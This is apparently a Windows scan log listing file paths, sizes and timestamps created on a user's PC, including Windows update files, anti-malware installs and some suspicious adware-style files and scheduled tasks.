2018-05-26 14:22 - 2018-05-26 14:22 - 001987417 _____ C:\Users\Craciun\AppData\Local\Biojob.tst
2018-05-26 14:22 - 2018-05-26 14:22 - 000126464 _____ C:\Users\Craciun\AppData\Local\noah.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000070896 _____ C:\Users\Craciun\AppData\Local\Config.xml
2018-05-26 14:22 - 2018-05-26 14:22 - 000018432 _____ C:\Users\Craciun\AppData\Local\Main.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000005568 _____ C:\Users\Craciun\AppData\Local\md.xml
2018-05-26 14:22 - 2018-05-26 14:20 - 002136576 _____ (TODO: <Company name>) C:\Users\Craciun\AppData\Local\Biojob.exe
2018-05-26 14:21 - 2018-05-26 14:24 - 000000000 ____D C:\ProgramData\PrefsSecure
2018-05-26 14:21 - 2018-05-26 14:21 - 000278510 _____ C:\Users\Craciun\AppData\Local\Statphase.bin
2018-05-26 11:53 - 2018-05-26 11:53 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\SUPERAntiSpyware.com
2018-05-26 11:52 - 2018-05-26 11:52 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
2018-05-26 11:51 - 2018-05-26 11:54 - 000000000 ____D C:\Program Files\SUPERAntiSpyware
2018-05-26 11:51 - 2018-05-26 11:51 - 000000000 ____D C:\ProgramData\SUPERAntiSpyware.com
2018-05-25 17:40 - 2018-05-27 09:39 - 000000000 ____D C:\Users\Craciun\AppData\Local\D3DSCache
2018-05-25 17:30 - 2018-06-11 07:59 - 000003292 _____ C:\Windows\System32\Tasks\MRT
2018-05-25 17:28 - 2018-05-25 17:28 - 000001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-05-25 17:28 - 2018-05-25 17:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-05-25 17:28 - 2018-04-26 05:36 - 000152184 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2018-05-25 07:50 - 2018-05-27 11:02 - 000000000 ____D C:\sysg
2018-05-24 22:54 - 2018-05-24 08:40 - 000001320 _____ C:\Windows\system32\Drivers\etc\hosts.old
2018-05-24 11:40 - 2018-05-24 11:45 - 000000000 ____D C:\Windows\system32\config\bbimigrate
2018-05-24 11:40 - 2018-05-24 11:40 - 000000000 ___DL C:\Users\Public\Recorded TV (2)
2018-05-24 11:37 - 2018-05-24 11:40 - 000000000 ____D C:\Windows\ServiceProfiles
2018-05-24 11:37 - 2018-05-24 11:37 - 000008192 _____ C:\Windows\system32\config\userdiff
2018-05-24 11:33 - 2018-05-24 11:33 - 025848832 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 023862272 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 022707712 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 022002688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 021389360 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 020383720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 019525120 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 019399168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 013570560 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 012712960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 012500992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 011903488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 009159064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 008623104 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 008188928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007987712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007583232 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007519992 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007436624 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 006661632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 006569952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 006044104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 005951488 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 005782528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004929024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004867072 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004706816 _____ (Microsoft Corporation) C:\Windows\system32\cdp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004372992 _____ (Microsoft Corporation) C:\Windows\system32\EdgeContent.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004070400 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003732800 _____ C:\Windows\system32\Windows.Mirage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003712000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003655168 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 003440640 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003392512 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003389952 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003320320 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003283400 _____ (Microsoft Corporation) C:\Windows\system32\CoreUIComponents.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003086336 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003015168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002961408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002902528 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002900992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002897408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002841312 _____ C:\Windows\SysWOW64\Windows.Mirage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002835864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002753040 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002700800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002486976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreUIComponents.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002422168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002366976 _____ (Microsoft Corporation) C:\Windows\system32\WebRuntimeManager.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002242208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002236928 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002170368 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.onecore.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001953280 _____ C:\Windows\system32\rdpnano.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001855488 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001817088 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001664512 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001636352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001634800 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001586176 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001585664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001565592 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001550848 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.desktop.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001534976 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001466368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001456616 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-05-24 11:33 - 2018-05-24 11:33 - 001454016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001426328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001421312 _____ (Microsoft Corporation) C:\Windows\system32\rdpbase.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001380864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001258280 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 001235968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpbase.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001191168 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001174424 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 001160192 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001063320 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2018-05-24 11:33 - 2018-05-24 11:33 - 001034624 _____ (Microsoft Corporation) C:\Windows\system32\ApplyTrustOffline.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 001012120 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000976384 _____ (Microsoft Corporation) C:\Windows\system32\Spectrum.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000960512 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000944640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Mirage.Internal.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000933376 _____ (Microsoft Corporation) C:\Windows\system32\rasapi32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000917504 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000898560 _____ (Microsoft Corporation) C:\Windows\system32\WpcWebFilter.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000894464 _____ (Microsoft Corporation) C:\Windows\system32\webplatstorageserver.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000885848 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000860160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasapi32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000836608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000826776 _____ (Microsoft Corporation) C:\Windows\system32\AppVClient.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000814592 _____ (Microsoft Corporation) C:\Windows\system32\EdgeManager.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000788216 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000786168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000776880 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000775680 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000758272 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000749976 _____ (Microsoft Corporation) C:\Windows\system32\AppVReporting.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000733992 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000726528 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000709816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000705944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000695296 _____ (Microsoft Corporation) C:\Windows\system32\hhctrl.ocx
2018-05-24 11:33 - 2018-05-24 11:33 - 000669184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000668672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000665320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000658432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000652184 _____ (Microsoft Corporation) C:\Windows\system32\AppVPublishing.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000624128 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000619520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000615424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EdgeManager.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000613376 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs4.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000606448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000604568 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000596480 _____ (Microsoft Corporation) C:\Windows\system32\updatehandlers.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000585728 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs3.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000584192 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbonRes.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000581120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hhctrl.ocx
2018-05-24 11:33 - 2018-05-24 11:33 - 000578560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webplatstorageserver.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000567136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000559968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000553984 _____ (Microsoft Corporation) C:\Windows\system32\PerceptionSimulationExtensions.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000543744 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000524800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000494488 _____ (Microsoft Corporation) C:\Windows\system32\WerFault.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000474624 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs2.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000473496 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs1.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000434584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WerFault.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000399768 _____ (Microsoft Corporation) C:\Windows\system32\AppVScripting.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000392192 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000382872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\clfs.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000344064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.th.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000272288 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000269216 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave_secure.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\MixedReality.Broker.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000241664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.win81.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000171520 _____ (Microsoft Corporation) C:\Windows\system32\itss.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000170904 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.Analog.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000154112 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000150528 _____ (Microsoft Corporation) C:\Windows\system32\SharedPCCSP.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000150016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\itss.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000143360 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.win8rtm.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000134552 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000117760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\wcimage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000001312 _____ C:\Windows\system32\tcbres.wim
2018-05-24 11:25 - 2018-05-24 11:25 - 007702016 _____ (Microsoft Corporation) C:\Windows\system32\NL7Models0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 007406080 _____ (Microsoft Corporation) C:\Windows\system32\NL7Data0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 007242240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NL7Data0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 002454528 _____ (Microsoft Corporation) C:\Windows\system32\NL7Lexicons0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 000712704 _____ (Microsoft Corporation) C:\Windows\system32\MSWB70011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 000516096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSWB70011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 000002060 _____ C:\Windows\system32\noise.jpn
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files\Reference Assemblies
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files\MSBuild
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files (x86)\MSBuild
2018-05-24 11:24 - 2018-05-24 11:24 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
2018-05-24 11:24 - 2018-05-24 11:24 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
2018-05-24 11:24 - 2018-05-24 11:24 - 000124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2018-05-24 11:24 - 2018-05-24 11:24 - 000103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2018-05-24 11:24 - 2018-05-24 11:24 - 000035456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2018-05-24 11:24 - 2018-05-24 11:24 - 000035456 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2018-05-24 11:23 - 2018-05-24 11:23 - 004492288 _____ (Microsoft Corporation) C:\Windows\system32\xpsrchvw.exe
2018-05-24 11:23 - 2018-05-24 11:23 - 003398144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xpsrchvw.exe
2018-05-24 11:23 - 2018-05-24 11:23 - 000925696 _____ (Microsoft Corporation) C:\Windows\system32\XpsFilt.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsFilt.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000100352 _____ (Microsoft Corporation) C:\Windows\system32\XPSSHHDR.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000082432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XPSSHHDR.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000076060 _____ C:\Windows\SysWOW64\xpsrchvw.xml
2018-05-24 11:23 - 2018-05-24 11:23 - 000076060 _____ C:\Windows\system32\xpsrchvw.xml
2018-05-24 11:22 - 2018-05-24 11:22 - 003331584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NlsLexicons0018.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 003331584 _____ (Microsoft Corporation) C:\Windows\system32\NlsLexicons0018.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 001914880 _____ (Microsoft Corporation) C:\Windows\system32\MLS2.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 001866752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MLS2.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 000166912 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0018.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 000131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NlsData0018.dll
2018-05-24 09:59 - 2018-05-24 10:05 - 000656668 _____ C:\Windows\Minidump\052418-65906-01.dmp
2018-05-24 09:59 - 2018-05-24 09:59 - 561529806 _____ C:\Windows\MEMORY.DMP
2018-05-24 09:59 - 2018-05-24 09:59 - 000000000 ____D C:\Windows\Minidump
2018-05-24 09:01 - 2018-05-24 09:01 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\EpicNet Inc
2018-05-24 09:01 - 2018-05-24 09:01 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-24 09:00 - 2018-05-24 09:00 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-24 08:58 - 2018-05-24 08:58 - 000003678 _____ C:\Windows\System32\Tasks\FastDataX Task
2018-05-24 08:56 - 2018-06-10 11:59 - 000003602 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-24 08:56 - 2018-06-10 11:59 - 000003246 _____ C:\Windows\System32\Tasks\csrss
2018-05-24 08:56 - 2018-05-24 08:58 - 009159064 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2018-05-24 08:56 - 2018-05-24 08:58 - 001258280 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2018-05-24 08:48 - 2018-05-24 08:48 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\SystemHealer
2018-05-24 08:45 - 2018-06-11 07:56 - 000003644 _____ C:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask
2018-05-24 08:45 - 2018-06-10 12:02 - 000000618 __RSH C:\ProgramData\ntuser.pol
2018-05-24 08:44 - 2018-05-24 10:02 - 000016796 _____ C:\Windows\System32\Tasks\LangaCount
2018-05-24 08:44 - 2018-05-24 08:44 - 000000000 ____D C:\Program Files\My Program
2018-05-24 08:44 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-24 08:41 - 2018-05-24 08:41 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\FastDataX
2018-05-24 08:40 - 2018-06-09 21:21 - 000929792 _____ C:\Users\Craciun\AppData\Local\sham.db
2018-05-24 08:40 - 2018-06-03 08:37 - 000048288 _____ C:\Users\Craciun\AppData\Local\InstallationConfiguration.xml
2018-05-24 08:39 - 2018-05-24 20:33 - 000000000 ____D C:\Program Files (x86)\ShutdownTime
2018-05-24 08:39 - 2018-05-24 20:32 - 000000000 ____D C:\Program Files (x86)\Multitimer
2018-05-24 08:36 - 2018-05-24 20:32 - 000000000 ____D C:\Program Files (x86)\foldershare
2018-05-24 08:36 - 2018-05-24 08:39 - 000000000 ____D C:\Program Files (x86)\trs
2018-05-24 08:36 - 2018-05-24 08:37 - 000000000 ____D C:\ProgramData\yahoochrome_D
2018-05-24 08:34 - 2018-06-11 20:27 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\WidModule
2018-05-24 08:34 - 2018-05-24 08:34 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-24 08:33 - 2018-05-24 08:33 - 000003290 _____ C:\Windows\System32\Tasks\jgvcz
